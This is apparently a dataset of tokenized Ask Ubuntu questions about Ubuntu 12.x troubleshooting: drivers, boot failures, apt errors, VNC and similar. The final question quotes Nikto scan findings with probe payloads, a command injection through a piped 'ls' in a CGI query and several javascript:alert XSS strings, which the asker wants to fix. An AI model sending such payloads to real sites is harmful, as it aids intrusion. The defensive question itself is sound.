272708	midori - how to activate shockwave flash on startup	i love this little speedy browser , however , i do not always find it easy to configure . for some reason shockwave flash extension would not stay activated on startup , as the adblock extension does , which is slightly annoying . i 'd prefer to combine it with a flashblock userscript rather than to go to the preferences everytime i want to use flash . do you know how to correct this ?
272709	what log shall i explore to discover cause of `` could n't generate pgp key '' ?	while attempting to join the u+1 and download the code of conduct i followed the instructions on generating a public key and received the subj message . ubuntu 12.10 gnome session fall back chromium browser dell inspiron 6000 laptop intel celeron 1.5 ghz 2 gb mem 40 gb hdd thanks in advance pete
272713	midori - remove `` search with ... '' option showing in address bar when typing an address	i love this little speedy browser , however , i do not always find it easy to configure . anyone knows how to modify midori 's configuration to remove the `` search with '' and `` open tabs '' lines from the address bar when one types an address ? the history is sufficient for me . actually getting only the bookmarks would be even better . is that possible ? thanks ,
272715	ubuntu 12.04 does not start on macbook pro : black screen	i 'm trying to dual boot ubuntu 12.04 on my macbook pro running osx 10.8 ( the laptop itself is brand new as of march 2013 , if that tells you something about the model . ) however , when i boot ubuntu , i 'm left with a black screen which prints alot of text about starting/stopping services , but does not function as a terminal . it hangs indefinitely at this screen until i shutdown via power button , which causes it to print more text in regards to `` unmounting '' and `` halting . '' thus far i have completed the following steps : installed refit & gpt fdisk on osx . created a new partition , installed ubuntu 12.04 onto that ext4 partition via usb . no issues during installation . my boot procedure is the following : power button to turn on refit loads , i can select mac or linux from a gray screen . i select linux , sits on a gray screen briefly then loads grub . now on the grub menu ( maroon/purple screen ) , i have options to boot `` ubuntu 12.04 generic '' or mac . i select the first option , being the default ubuntu , and it begins loading . this is where it hangs : black screen with some text output . it lists operations it performed followed by `` [ ok ] '' . there is one `` [ fail ] '' listed for an audio related service ( i do n't think this is the issue . ) edit : here are the last 3 lines printed when the computer hangs : starting userspace bootsplash ... [ ok ] starting lightdm display manager ... [ ok ] stopping userspace bootsplash ... [ ok ] _ ( the '_ ' is a blinking text cursor that does not accept user input . ) am i looking at a hardware/driver issue ? what can i do to fix this ?
272716	ubuntu one stuck on `` getting information , please wait ... '' , windows 7	i know , this has been asked before ( win 7 ultimate wo n't run ubuntu one : 'getting information , please wait ... ' forever ) , and i have already tried out the suggested answer , but it did n't work for me . the situation is really that simple : i start ubuntu one , latest version ( afaik , it just updated itself ) . the main screen is grayed out . a message is displayed `` getting information , please wait ... '' with a loading bar going back and forth all the time . i have waited for more than an hour now . i have tried restarting it as administrator after killing all related process , but the situation remains the same . i 'm using windows 7 , latest updates . any more information required ? any suggestions ?
272721	failed to update apt-get	every time i run sudo apt-get update the following error occurs . w : failed to fetch http : //ppa.launchpad.net/ackondro/tibesti/ubuntu/dists/quantal/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/ackondro/tibesti/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/ackondro/tibesti/ubuntu/dists/quantal/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/cooperjona/stormcloud/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/cooperjona/stormcloud/ubuntu/dists/quantal/main/binary-i386/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/gnome-split-team/ppa/ubuntu/dists/quantal/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/gnome-split-team/ppa/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/gnome-split-team/ppa/ubuntu/dists/quantal/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . this dose not bother me that much , but i would be very happy if i could get it fixed . thanks !
272722	setting up triple monitors with a display link adapter	my first question , i suppose , is `` is this setup even possible ? '' i 'm running a dell n7010 with ubuntu 12.10 and i have two external monitors . one of them is connected with a vga cable and is running perfectly . the other is connected with a displaylink adapter and the monitor has a green screen . here is the xorg.conf that i hacked together section `` serverlayout '' identifier `` threescreens '' screen `` vga '' 0 0 screen `` laptop '' rightof `` laptop '' screen `` displaylink '' leftof `` laptop '' 0 0 inputdevice `` keyboard '' `` corekeyboard '' inputdevice `` mouse '' `` corepointer '' endsection section `` device '' identifier `` displaylinkdevice '' driver `` fbdev '' busid `` video bus '' # needed to use multiple displaylink devices option `` fbdev '' `` /dev/fb0 '' # change to whatever device you want to use option `` rotate '' `` ccw '' # uncomment for rotation endsection section `` monitor '' identifier `` displaylink '' device `` displaylinkdevice '' horizsync 31-101 vertrefresh 60-160 endsection section `` screen '' identifier `` displaylink '' device `` intel corporation core processor integrated graphics controller '' defaultdepth 24 subsection `` display '' depth 24 virtual 1680x1050 endsubsection endsection section `` monitor '' identifier `` laptop '' device `` intel corporation core processor integrated graphics controller '' horizsync 31-101 vertrefresh 60-160 endsection section `` screen '' identifier `` laptop '' device `` intel corporation core processor integrated graphics controller '' defaultdepth 24 subsection `` display '' depth 24 virtual 1680x1050 endsubsection endsection section `` monitor '' identifier `` vga '' device `` intel corporation core processor integrated graphics controller '' horizsync 31-101 vertrefresh 60-160 endsection section `` screen '' identifier `` vga '' device `` intel corporation core processor integrated graphics controller '' defaultdepth 24 subsection `` display '' depth 24 virtual 1680x1050 endsubsection endsection when i boot the boot screen appears on every screen , but when it finishes booting none of the screens display anything , but they are on . what is my best course of action here ?
272723	how to use the wordpress juju charm to add existing database content	i 've been looking at the wordpress juju charm and i 'd like to use it to create instances of developer.ubuntu.com for testing and design purposes . i believe i can use it as-is , apart from one bit : the d.u.c theme requires a copy of the database to be installed . is this something that i could do with the current charm ? would i need to add anything to it ?
272728	black screen after grub , ca n't install . uefi	i know there are tons of threads like this and i 've tried everything i can think of that has been given as an answer in those threads . the problem : i select the usb flash drive as my boot device , and it loads a grub menu , that says something like `` try ubuntu without installing '' `` install ubuntu '' `` oem installation '' . i click any one of them , and i just get a black screen . i can control alt delete to restart , so my pc is not hanging . if i change uefi mode to legacy in the bios , then it skips the grub menu and goes straight to a graphical ubuntu installer . i need to install as uefi as my windows 8 installation is as such . i ca n't boot it if it 's set to legacy . note that secure boot and uefi are different in my bios , i can disable secure boot without disabling uefi . however , i still get the black screen . things i 've tried : 1 ) nvidia.modeset = 0 2 ) grub_gfxmode = 1024x768x32 3 ) grub_gfxmode=vga=vesa 4 ) vga=vesa 5 ) a different monitor via hdmi 6 ) a different monitor via vga 7 ) different formats of my flash drive edit : some more things i 've tried 8 ) confirmed md5 is correct 9 ) downloaded linux secure remix 12.10 , no difference . 10 ) tried drm_kms_helper.poll = 0 11 ) tried acpi_osi=linux 12 ) tried acpi_backlight=vendor nothing works yet . none of these work , i still get the black screen . my laptop is a msi ge-70 with the following specs : intel i7 3630qm nvidia gtx-660m with optimus gddr5 8gb ddr3 ram os : windows 8 installed as uefi . i believe this not to be a duplicate since i have tried everything i can find , and nothing seems to work . does anyone have any idea what it could be ?
272729	accidently deleted /usr/lib , how do i restore it ?	i know this is something i should n't do , but it happened ( ubuntu 12.04.1 lts ) as a root user i deleted /usr/lib folder . any ideas how to restore it ?
272730	lexmark s305 and ubuntu 12.10 : no usb recognition	i am having trouble setting my new dell v313w printer ( which is a lexmark s305 with a dell logo ) on ubuntu 12.10 . i installed the drivers from http : //support.lexmark.com/index ? page=product & segment=download & productcode=lexmark_impact_s305 & locale=en & userlocale=de # 2 they only have drivers for ubuntu 12.04 but that should not be a problem , or should it ? after that ubuntu sees that i have a lexmark printer and propose me to plug it in via usb in order to configure it . but it does not see the printer although it is connected to my computer via usb . this printer does not have an ethernet port so i can only access it via usb . what should i do ? thanks for your replies . regards .
272735	how does ubuntu ensure that packages and isos from mirrors are safe ?	my current location is thousands of kilometers from ubuntu 's main server and i am obliged to use one of its mirrors in my country of domicile . do the owners of ubuntu implement measures to periodically check their files ( eg . isos , updates , security patches ) at their mirror sites have not been tampered and/or malware/trojans have not been introduced by hackers ? my personal experience with installing and updating ubuntu from the main server took at least two hours whereas the same process took just 10 to 15 minutes when i used ubuntu mirror site available in my country .
272741	how to fix compilation errors that mention `` stray ‘\342’ '' and `` stray ‘\200’ '' ?	i wrote this program : # include < stdio.h > int main ( ) { printf ( “hello world\n” ) ; return 0 ; } i saved it as first.c and tried to compile but receiving this problem i have installed even gcc compiler too . zahid @ zahid-hp-compaq-nc6400-eh522av : ~/programs $ gcc first.c -o first1 first.c : in function ‘main’ : first.c:4:1 : error : stray ‘\342’ in program first.c:4:1 : error : stray ‘\200’ in program first.c:4:1 : error : stray ‘\234’ in program first.c:4:11 : error : ‘hello’ undeclared ( first use in this function ) first.c:4:11 : note : each undeclared identifier is reported only once for each function it appears in first.c:4:17 : error : expected ‘ ) ’ before ‘world’ first.c:4:17 : error : stray ‘\’ in program first.c:4:17 : error : stray ‘\342’ in program first.c:4:17 : error : stray ‘\200’ in program first.c:4:17 : error : stray ‘\235’ in program zahid @ zahid-hp-compaq-nc6400-eh522av : ~/programs $ how can i fix this problem ?
272742	how to create live cd once i downloaded the zip file .	i am trying to use ubuntu to recover my windows xp password on an old computer . i have the zip files and winzip but how do i create an iso image on a dvd ? i have ubuntu 12.04.2 and 12.10 desktop
272745	how to use modeswitch	i a 3g data card , on my window system i can access its memory but i cant access the memory of the device so my question is how i can access memory of my data card on ubuntu 12,04 ? why my device is not behaving plug n play ? what is usb modeswitch ? how to use it ? here is the output of the command lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 04f2 : b159 chicony electronics co. , ltd bus 003 device 002 : id 03f0:231d hewlett-packard bus 002 device 014 : id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard
272746	changed username in launchpad and now my re-installs do not work	a couple of days back i changed my username on launchpad because it had my full name ( with initials ) . the problem is that before i did that i went to humble bundle and associated those purchases with my ubuntu software center . now , when it tries to install the software , it is attempting to use the old username instead of the new one . i tried to `` log out '' of ubuntu software center by removing the password and key , but when i re-install software it still fails . i confirmed this when i looked at the /etc/apt/auth and all the ppa usernames were set to the old one . there is one work around . it looks like if i change it in this file i was able to install via term some software , but if i attempt a re-install via ubuntu software center it just sets the username back to the old one in the auth.conf file . does anyone know how i can get the software center to recognize the new username ? one other thing . when i went to https : //software-center.ubuntu.com/subscriptions/ and click on any of the purchased software it still has my old username attached to the source . how do i get this changed ?
272749	how to automount usb external hardisks in ubuntu server 12.04 ?	how can i automount usb hds ? i installed usbmount but seems not working . here below a few details : sudo fdisk -lu : disk /dev/sda : 20.4 gb , 20416757760 bytes 255 heads , 63 sectors/track , 2482 cylinders , total 39876480 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000859fe device boot start end blocks id system /dev/sda1 * 2048 38238207 19118080 83 linux /dev/sda2 38240254 39874559 817153 5 extended /dev/sda5 38240256 39874559 817152 82 linux swap / solaris disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0000d617 device boot start end blocks id system /dev/sdb1 * 2048 972597247 486297600 83 linux /dev/sdb2 972599294 976771071 2085889 5 extended /dev/sdb5 972599296 976771071 2085888 82 linux swap / solaris disk /dev/sdc : 40.0 gb , 40020664320 bytes 255 heads , 63 sectors/track , 4865 cylinders , total 78165360 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x43ba43ba device boot start end blocks id system /dev/sdc1 * 63 78140159 39070048+ 7 hpfs/ntfs/exfat disk /dev/sdd : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000c85ff device boot start end blocks id system /dev/sdd1 63 1953520064 976760001 7 hpfs/ntfs/exfat disk /dev/sde : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x48686a76 device boot start end blocks id system /dev/sde1 63 2930272064 1465136001 7 hpfs/ntfs/exfat sudo blkid : /dev/sda1 : uuid= '' 70d2b83a-1b0a-4c5d-b6ff-89d187b4c96a '' type= '' ext4 '' /dev/sda5 : uuid= '' 444db037-76b9-4a53-b357-ab5ae1764044 '' type= '' swap '' /dev/sdb1 : label= '' 500gb '' uuid= '' 7c0f92c4-3428-4e0a-b724-abe13229224c '' type= '' ext4 '' /dev/sdb5 : uuid= '' 370e0ecf-3190-4fe8-92d3-13cb1fedecb1 '' type= '' swap '' /dev/sdc1 : label= '' admin_only '' uuid= '' 528b53ef-15ac-4a2d-ad97-425af3a61995 '' type= '' ext4 '' /dev/sdd1 : label= '' hitachi '' uuid= '' e7f30f9f-2d42-4222-bce3-4b58d65c26e3 '' sec_type= '' ext2 '' type= '' ext3 '' /dev/sde1 : label= '' toshiba '' uuid= '' 5c61d0bd-eb41-4a8e-aa4e-b6db05d1b43e '' sec_type= '' ext2 '' type= '' ext3 '' mount : /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) thank you !
272753	toshiba c850 brightness problem	i have recently bought a toshiba satellite c850 laptop . i 've managed to install ubuntu 12.10 on it and everything works fine ( this site helped me installing the wireless driver ) . the problem is that the brightness of the screen is full , 100 % , and i ca n't adjust it . the f2 key should decrease the brightness but nothing happen when pressed ( with or without fn ) . i searched this site and tried out every answer relevant to the problem . i 've tried the grub parameters , the ati property driver and xbacklight ( a friend told me xbacklight wont work in 3.4+ kernels ) . the result , all failed . i 'm really stuck now . if you know a solution please help . model : toshiba c850 gpu : amd/ati radeon hd 7610m
272754	`` failed to fetch '' error when installing eclipse !	i am trying to install eclipse by using the ubuntu software center . i do have an internet connection and i have actually downloaded other software successfully . however , when i try to install eclipse , i get the following error : failed to download package files check your internet connection . failed to fetch http : // archive.ubuntu.com /ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-lib_6b27-1.12.3-0ubuntu1~12.04_all.deb 404 not found [ ip : 91.189.92.201 80 ] failed to fetch http : // archive.ubuntu.com /ubuntu/pool/main/n/nss/libnss3-1d_3.14.1-0ckbi1.93ubuntu.0.12.04.1_amd64.deb 404 not found [ ip : 91.189.92.201 80 ] failed to fetch http : // archive.ubuntu.com /ubuntu/pool/main/o/openjdk-6/openjdk-6-jre-headless_6b27-1.12.3-0ubuntu1~12.04_amd64.deb 404 not found [ ip : 91.189.92.201 80 ] failed to fetch http : // archive.ubuntu.com /ubuntu/pool/main/o/openjdk-6/openjdk-6-jre_6b27-1.12.3-0ubuntu1~12.04_amd64.deb 404 not found [ ip : 91.189.92.201 80 ] failed to fetch http : // archive.ubuntu.com /ubuntu/pool/main/o/openjdk-6/openjdk-6-jdk_6b27-1.12.3-0ubuntu1~12.04_amd64.deb 404 not found [ ip : 91.189.92.201 80 ] failed to fetch http : // archive.ubuntu.com /ubuntu/pool/main/o/openjdk-6/icedtea-6-jre-cacao_6b27-1.12.3-0ubuntu1~12.04_amd64.deb 404 not found [ ip : 91.189.92.201 80 ] failed to fetch http : // archive.ubuntu.com /ubuntu/pool/main/o/openjdk-6/icedtea-6-jre-jamvm_6b27-1.12.3-0ubuntu1~12.04_amd64.deb 404 not found [ ip : 91.189.92.201 80 ] any help is deeply appreciated .
272758	backup fails , not enough space	i have back up set up to back up to my ubuntu one account , but for some reason when it is backing up it tries and then gives me the error : backup location is too small . try using one with more space . i do n't think my ubuntu one account has too little space , as it has backed up before , at least i believe it has as when i check my account it shows files from the backup there . this is n't a major problem , just a minor annoyance .
272760	network does n't work on ubuntu	i 've migrated physical ubuntu to hyper-v 2012 with acronis universal restore . it worked fine for a while till i rebooted machine . after reboot the network does come up : but any ping or anything does n't work . there 's no firewall . i removed other networks from /etc/udev/rules.d/70-persistent-net.rules because i tried adding multiple interfaces after reboot broken the network and it kept adding more addresses . the ip address is from dhcp and when i was adding new lan it was getting new addresses every time . so i removed all interfaces and after reboot eth0 showed up with old ip address again from dhcp . still no network ... kernel is 2.6.32-41 . keep in mind it worked just prior reboot and that i have very little knowledge about linux . i 'm windows guy .
272772	why i ca n't open mysql 5.6.10 from terminal on ubuntu 12.10 ?	i 've always used ubuntu to host my servers and i wanted to try the new mysql version . so i downloaded mysql 5.6.10 ( .deb ) from their official site and installed it like this : tutorial for mysql install and everything worked nicely , except from when i was going to log in . i got this error : root @ person-ubuntu : /opt/mysql/server-5.6 # mysql -u root -p the program 'mysql ' is currently not installed . you can install it by typing : apt-get install mysql-client-core-5.5 but if i run : root @ person-ubuntu : ~ # /etc/init.d/mysql.server status i get the following output : * mysql running ( 14429 ) so can anyone help me out here ?
272775	ubuntu 12.10 macbook pro 7.1 freezing after install	i 've just gut a macbook pro 7.1 and wanted to install ubuntu 12.10 on it . the installation itself works flawlessly , although the menu bar is missing during installation ? ! nevertheless , the install works fine and i can even boot to the login-screen and enter username/password . then the mouse pointer freezes and you can only see the default desktop background . no sign of the unity interface ... i 've already tried this and this , but it 's not working . i can not even enter the command line by pressing ctrl+alt+f1 . i 've also tried the nomodeset at boot-time - this way i can at least enter the command line . x.org log file any further suggestions ?
272776	chrome tab syncing across devices not working	i 've found this guide to sync chrome tabs across devices and i enabled sync on both devices . nothings happening though when i enabled tab sync on my pc and notebook . how do i open the tabs from one device on the other ? both devices run ubuntu 12.04 64bit . http : //www.howtogeek.com/96664/how-to-sync-open-tabs-across-computers-using-google-chrome/
272777	installing ralinl rt3290 wireless driver in ubuntu studio 12.10	i 've been using windows since 20 years ago , and now i 've decided to try ubuntu , i find that it 's impossible to activate the dammed wireless . i have been following the instructions in different forums to install the driver and there is no way , i 'm sick and i am thinking seriously to return to the damned windows : i did n't now ubuntu was going to be so hard to use , i only want to install a damned driver , does it has to be so complicated ? ? ? my last try : i have updated kernel from 3.4 to 3.9 , and returned to install the rt3290 ralink driver following this : $ git clone git : //git.kernel.org/pub/scm/linux/kernel/git/dwmw2/linux-firmware.git $ sudo cp linux-firmware/rt3290.bin /lib/firmware and this : first , right-click the file and select rename . rename it to 2012_0508_rt3290_linux_sta_v2.6.0.0.tar.bz2 ; that is , without the leading slash and adding .tar . now right-click it and select extract here . open the file os/linux/config.mk with any text editor and change the line : has_native_wpa_supplicant_support=n ... to has_native_wpa_supplicant_support=y proofread , save and close the text editor . now , with a temporary ethernet connection , do : $ sudo apt-get install build-essential linux-headers-generic $ cd desktop/dpo_rt3290_linuxsta_v2600_20120508 ... or wherever you extracted the package , if not your desktop . $ sudo su $ make $ make install $ modprobe rt3290sta $ exit note : about thee git thing , the system told me that instruction is not installed , exactly the same as make install . may be there is a bug ? ? ? please help/
272780	ubuntu 12.10 lessc 1.3.3 installation	i can not install lessc 1.3.3 installation . sudo apt-get install node-less version 1.3.0 i googled but i can not found a solution . is that any alternative exist ?
272787	external monitor stopped working	i have an asus notebook with ubuntu 12.10 . my external monitor was working fine but after unpluging/repluging it , it 's now detected as `` unknown '' in my display settings , and i do n't get any signal on the monitor . however it still works fine with an other monitor at my office , and on the other hand , my monitor still works fine with my desktop pc on windows 7 . i 've tried chaging the cable , does n't help . i 've tried rebooting , using gnome classic instead of unity , i 've checked the things i 've installed recently , and i do n't see anything that could affect monitors . here is the answer for xrandr with the monitor plugged in : screen 0 : minimum 320 x 200 , current 2390 x 768 , maximum 8192 x 8192 edp1 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 293mm x 164mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 connected 1024x768+1366+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0* 800x600 60.3 56.2 848x480 60.0 640x480 59.9 hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) i do n't see any information i could add here , but since it was working fine until now and both laptop and monitor are still working individually , this really look strange ... does anyone has any idea what i could try ? thanks for your attention !
272788	how can i tell how long for watchdog to wait to stop all processes ?	i have a server which is monitored by watchdog , and experiences reboots occasionally due to faulty network hardware i am unable to replace at the moment . as i read , watchdog sends a sigterm to all processes , requesting a safe shutdown , and after a short time , sends a sigkill , which will stop the process immediately . however , in this case , it leads to data corruption since the main process of importance is not fully shut down yet and has unwritten data . how long is this pause watchdog takes between asking all processes to stop , and forcing them to stop ? is it hardwired within watchdog , set in watchdog.conf ( if it was , it never got documented in the manpage ) , or the same as another system setting ? how may i change this setting ? edit : i 've found the timeout , but i am still looking for instructions on how to rebuild and integrate with the system properly .
272790	websphere application server 8.5 can be installed on ubuntu 12.04 ? and how ?	if was can be installed on ubuntu , how to config & install ?
272791	parallel applications on nexus 4 - cpufreq drivers ?	i was trying to run parallel applications ( pbzip2 , pigz ) from inside of `` ubuntu_chroot shell '' , however i do not see any speedup from their sequential counterparts ( bzip2 , gzip ) . i tried to install cpufrequtils , however i am seeing following errors during installation and use : installation : unpacking cpufrequtils ( from ... /cpufrequtils_008-1_armhf.deb ) ... processing triggers for ureadahead ... setting up cpufrequtils ( 008-1 ) ... * loading cpufreq kernel modules ... [ ok ] * cpufreq utilities : setting ondemand cpufreq governor ... * cpu0 ... * cpu1 ... * cpu2 ... * cpu3 ... [ fail ] running cpufreq-info : phablet @ localhost : ~/test $ cpufreq-info cpufrequtils 008 : cpufreq-info ( c ) dominik brodowski 2004-2009 report errors and bugs to cpufreq @ vger.kernel.org , please . analyzing cpu 0 : driver : msm cpus which run at the same hardware frequency : 0 cpus which need to have their frequency coordinated by software : 0 maximum transition latency : 0.00 ms. hardware limits : 384 mhz - 1.51 ghz available frequency steps : 384 mhz , 486 mhz , 594 mhz , 702 mhz , 810 mhz , 918 mhz , 1.03 ghz , 1.13 ghz , 1.24 ghz , 1.35 ghz , 1.46 ghz , 1.51 ghz available cpufreq governors : interactive , ondemand , userspace , powersave , performance current policy : frequency should be within 384 mhz and 1.51 ghz . the governor `` ondemand '' may decide which speed to use within this range . current cpu frequency is 384 mhz . cpufreq stats : 384 mhz:89.53 % , 486 mhz:0.56 % , 594 mhz:0.42 % , 702 mhz:0.05 % , 810 mhz:0.02 % , 918 mhz:0.02 % , 1.03 ghz:0.02 % , 1.13 ghz:0.01 % , 1.24 ghz:0.01 % , 1.35 ghz:0.01 % , 1.46 ghz:0.01 % , 1.51 ghz:9.34 % ( 21486 ) analyzing cpu 1 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 0.00 ms. analyzing cpu 2 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 0.00 ms. analyzing cpu 3 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 0.00 ms .
272796	connecting to archive.ubuntu.com takes too long	i have a ubuntu 11.10 server that i just installed fresh . now if i try to do anything with apt-get , it tries to connect to archive.ubuntu.com .. it stays at [ connecting to archive.ubuntu.com ( 2001:67c:1360:8c01 : :1a ) ] phase for like 2 minutes , after which it actually starts to communicate and download stuff ... eventually it always connects , but in waits at the [ connecting to archive.ubuntu.com ( 2001:67c:1360:8c01 : :1a ) ] phase everytime for like 2 minutes ! i did n't have this problem previously on ubuntu 11.10 , right after reinstalling the os .. any ideas on what the problem might be ?
272805	disable incognito in chrome or chromium	i 'm addicted to certain websites to the point where it 's interfering with my life regularly and sick of it . i want to install website blockers that are n't easy to circumvent . in chrome , incognito mode is easily accessible with a ctrl-shift-n. that is ridiculous . whenever i feel an urge to go on an addictive website , it does n't matter what blockers and regulators i 've got installed ; three keys can get round them in a second . simply uninstalling chrome is n't an option either , as it 's way too easy to sudo apt-get install it right back . so yes , i want to disable incognito mode completely ( and if possible making it totally impossible to get it back ) . i note that some guy has figured out how to do it on windows with a registry entry : http : //wmwood.net/software/incognito-gone-get-rid-of-private-browsing/ if it can be done on windows it can be done on ubuntu !
272810	trying to update to 12.10 but update manager not showing update for it	when i go to update to 12.10 from 12.04.02 , the update manager is not showing that there is an update for ubuntu and the konsole is saying that i have 12.04.02 when i see what release is on my computer .
272812	getting a blue wallpaper screen with no desktop bars	i just got a linus vps after like 6-7 months . i installed a clean copy of 11.10 , and then used this tutorial to install ubuntu-desktop and get a vnc connection going : http : //www.webhostingtalk.com/showthread.php ? t=1029327 note that i 've installed 11.10 dozens of times previously , and everytime this guide did the trick ! now however , when i follow the exact same procedure , when i actually open a vnc connection , here 's the screen i see : i tried reinstalling the latest 12.10 , and the result was the same on that , with the only difference that instead of a blue screen , there 's that normal ubuntu wallpaper . when i followed this tutorial now , after 6-7 months , the only difference i noticed is that when i execute sudo apt-get install gdm , i get a terminal menu asking me which session manager to use . i never got this screen below . i tried selecting gdm here ( the other option was lightdm . when gdm gave me this screen , i tried switching to lightdm , but the result was the same .
272813	how to prevent a package from being installed	for personal reasons , i want to prevent chrome/chromium from ever being installed on my computer . i 'm looking for something as extreme as locking it down with a password and then throwing away that password . that would ensure i 'm never going to get it installed . obviously i could do that with my root password , but lets be serious : p i need that password for other things too
272814	how can i prevent the hacking of my wired and wireless networks by tools like feedingbottle ?	i am network administrator and i am always worried about network security as i know people use different techniques of hacking to penetrate wireless and wired networks . recently i came to about software called feedingbottle which can hack wep on finger tips ; you do n't even have to know anything about networking and hacking as its just a simple gui . i am interested in knowing how this works and what we can do to avoid this . i 'm also interested in knowing if there are any other tools available that can do this . i know about aircrack , but in order to use it you should have some knowledge about how it works . i know hacking wpa is really difficult and although most default passwords giving by isp 's are sometimes hackable , but if you change the password and use wpa or wpa2 it is nearly unhackable if the password is good . is this correct ? if not , how can i avoid having my passwords hacked ?
272818	polishing lxde by fixing the scroll bars	i like lxde , but how can i get full , always showing , scroll bars on my windows , and not the `` pop-up scroll bars which cause me time and trouble ?
272819	12.10 firefox 19 is memory hog	today i upgraded ubuntu from 12.04 to 12.10 and memory usage of firefox increased from around 150 mb in 12.04 to 350 mb in 12.10 . is there a way to fix this ?
272822	is there any browser for ubuntu that pretends to be internet explorer ?	i use ubuntu 12.10 . when i want to register for a service in some website , a messagebox appears saying `` please use internet explorer to use this item '' . the webdesigner assumes all users use ms windows ! is there any way this bypass this false assumption in ubuntu ? i have wine installed but i could n't find it 's explorer .
272823	open ebooks in ubuntu 12.04	i have downloaded e-books in both electronic publication and mobile reader . in windows a program called 7zip extracts the files . which program will do the same in ubuntu 12.04 ?
272827	xubuntu 12.10 install to sdb , no grub	after asking here i deleted my entire ubuntu install and reinstalled xubuntu as per instructions here . i 've partitioned 20gb root , 478gb home , 2gb swap , on sdb ( a non-booting windowsxp is on sda ) . i installed xubuntu from livecd onto sdb , which put grub on sda which is recommended for this exact situation by this post from this thread . my pc now does n't boot - no grub menu , just a flashing underscore . i redid the install - deleting partitions and re-doing them , just to make sure it was putting grub on sda . i can boot to livecd and use as normal . any idea what i should do ? thanks in advance .
272828	vnc server not asking for user-auth	i have setup my vnc server on ubuntu 12.04 following this guide . it all works fine , but what i would like it to do is upon connection prompt the user vncing to login . at the moment i am auto-logged on as root and the second i logout i just get a black screen . what i 'm saying is that i wish for it to show a gnome login screen i have gnome ( latest ) and vnc ( latest ) running ...
272829	help needed to fix security issues discovered using nikto on ubuntu server 12.10	what can be done to mitigate theses security issues found by nikto on all our ubuntu servers version 12.10 ? osvdb-2799 : /cgi-915/dose.pl ? daily & somefile.txt & |ls| : dailydose 1.1 is vulnerable to a directory traversal attack in the 'list ' parameter . osvdb-3233 : /icons/readme : apache default file found . /modules.php ? op=modload & name=faq & file=index & myfaq=yes & id_cat=1 & categories= % 3cimg % 20src=javascript : alert ( 9456 ) ; % 3e & parent_id=0 : post nuke 0.7.2.3-phoenix is vulnerable to cross site scripting ( xss ) . cert.org/advisories/ca-2000-02.html . this one is looking weird to me , since we do not use web wiz forum script ( can i assume this is just a false positive ? ? ? ! ! ! ! ? ? ? ) : osvdb-4598 : /members.asp ? sf= % 22 ; } alert ( 'vulnerable ' ) ; function % 20x ( ) { v % 20= % 22 : web wiz forums ver . 7.01 and below is vulnerable to cross site scripting ( xss ) . cert.org/advisories/ca-2000-02.html . osvdb-27071 : /phpimageview.php ? pic=javascript : alert ( 8754 ) : php image view 1.0 is vulnerable to cross site scripting ( xss ) . cert.org/advisories/ca-2000-02.html . thank you !
